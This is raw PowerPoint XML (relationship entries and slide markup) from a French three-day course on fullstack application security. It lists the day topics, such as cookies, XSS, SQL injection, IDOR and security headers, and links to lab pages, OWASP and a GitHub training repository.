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 Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide196.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide197.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide198.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide200.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide201.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide202.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide203.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20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Accueil. Les jours sont cliquables.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Ouvrir le jour. Le programme suit.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 de clavier. Pointer GitHub (repo à venir).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notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide62.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide111.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17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notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6"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xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide37.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide60.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6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notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dercetech/training-secu-5d" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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jpg"/><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owasp.org/Top10/2025/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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owasp.org/Top10/2025/" TargetMode="External"/><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4.png"/><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5.png"/><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www.offsec.com/courses/pen-200/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offsec.com/wp-content/uploads/2023/03/PEN-200-Module-General-Course-Info.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slid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1/s2_intro/python-flask" TargetMode="External"/><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1/s2_intro/node-express" TargetMode="External"/><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training.dercetech.com/trainings/python-html5-security/labs/day-1/s2/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.dercetech.com/trainings/python-html5-security/labs/day-1/s2/unsafe/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training2.dercetech.com/day-1/s2/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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training2.dercetech.com/day-1/s2/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blackthorn-winter-matchmaking-server.onrender.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide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training.bad-sector.games/secu-5d/day1/s2/" TargetMode="External"/><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6.png"/><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1/s2_02_cookies" TargetMode="External"/><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1/s2_03_samesite" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide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1/s3_password-hashing" TargetMode="External"/><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3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1/s3_password-hashing" TargetMode="External"/><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8.png"/><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training.dercetech.com/trainings/python-html5-security/labs/day-1/s4/safer/" TargetMode="External"/><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4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training.dercetech.com/trainings/python-html5-security/labs/day-1/s4/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.dercetech.com/trainings/python-html5-security/labs/day-1/s4/safer/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.dercetech.com/trainings/python-html5-security/labs/day-1/s2/unsafe/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4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4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4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1/s5_recap" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5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9.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6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 Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide80.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide91.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10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10.png"/><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2/s1_01_intro" TargetMode="External"/><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6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11.png"/><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6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12.png"/><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6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13.png"/><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6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6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8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sc8rumo3487.universe.wf/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dercetech/training-secu-5d/tree/main/_servers/incinerator" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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14.png"/><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8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8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8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8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8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8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15.png"/><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9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express-validator.github.io/docs/guides/schema-validation/" TargetMode="External"/><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9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9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16.png"/><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9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2/s3_02_validate_register" TargetMode="External"/><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9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17.png"/><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9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2/s3_03_complex_schema" TargetMode="External"/><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9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express-validator.github.io/docs/guides/schema-validation/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.pydantic.dev/latest/concepts/fields/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9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9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9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9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9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2/s4_recap" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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10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10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2/s4_recap" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10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10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63.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10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19.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11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14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide125.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide138.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17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1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jwt.io/#debugger-io?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsIm5hbWUiOiJBbm5lIn0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c" TargetMode="External"/><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1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1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0.png"/><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1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1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3/s1" TargetMode="External"/><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1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1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1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1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1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1.png"/><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2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2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3/s2_01_idor" TargetMode="External"/><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2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2.png"/><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2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2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2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2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3.png"/><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2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slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12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2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2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2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6.png"/><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38.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3/s03_01" TargetMode="External"/><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38.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3/s3_02_secrets" TargetMode="External"/><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38.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7.png"/><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38.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8.png"/><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38.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29.png"/><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38.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127.0.0.1:8037/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.dercetech.com/trainings/python-html5-security/labs/day-3/s3_04/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide138.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training.dercetech.com/trainings/python-html5-security/labs/day-3/s3_04/strict-transport-security/index.html" TargetMode="External"/><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38.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training.dercetech.com/trainings/python-html5-security/labs/day-3/s3_04/strict-transport-security/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13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3/s3_04_headers" TargetMode="External"/><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slide" Target="slide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13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github.com/Dercetech/training-secu-5d/tree/main/day-3/s3_04_headers" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13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s://training.dercetech.com/trainings/python-html5-security/labs/day-3/s3_04/referrer-policy/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8037/referrer-policy/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide138.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127.0.0.1:8037/content-security-policy/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.dercetech.com/trainings/python-html5-security/labs/day-3/s3_04/content-security-policy/trusted-widget.js" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide138.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hyperlink" Target="http://127.0.0.1:8037/permissions-policy/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.dercetech.com/trainings/python-html5-security/labs/day-3/s3_04/permissions-policy/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide138.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38.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7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12.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17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image" Target="../media/image37.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide179.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1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide184.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide186.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide189.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide193.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide198.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9.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9.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89.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9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9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9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9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98.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98.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198.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training.dercetech.com" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide179.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20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5" name="TextBox 4"/>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6" name="TextBox 5"/>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 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>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621792"/>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FORMATION PUBLIQUE  ·  3 JOURS + ANNEXE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="914400"/>
            <a:ext cx="10058400" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sécurité des applications fullstack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>
            <a:ext cx="10058400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Première ligne de défense  ·  Python / PostgreSQL / TypeScript  ·  3 jours, plus de lab  ·  l’annexe si vous avez fini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1700784"/>
            <a:ext cx="101498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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1828800"/>
            <a:ext cx="640080" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="1828800"/>
            <a:ext cx="9144000" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Jour 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="2029968"/>
            <a:ext cx="9144000" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP, navigateur, cookies, hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="2286000"/>
            <a:ext cx="9144000" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Facile. DevTools. XSS en un mot. Beaucoup de pratique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2560320"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2542032"/>
            <a:ext cx="640080" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="2542032"/>
            <a:ext cx="9144000" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Jour 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="2743200"/>
            <a:ext cx="9144000" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection, notes PHP, valider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="2999232"/>
            <a:ext cx="9144000" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Une apostrophe. Du PHP dans une note. L’après-midi : un seul scénario.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3273552"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3255264"/>
            <a:ext cx="640080" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
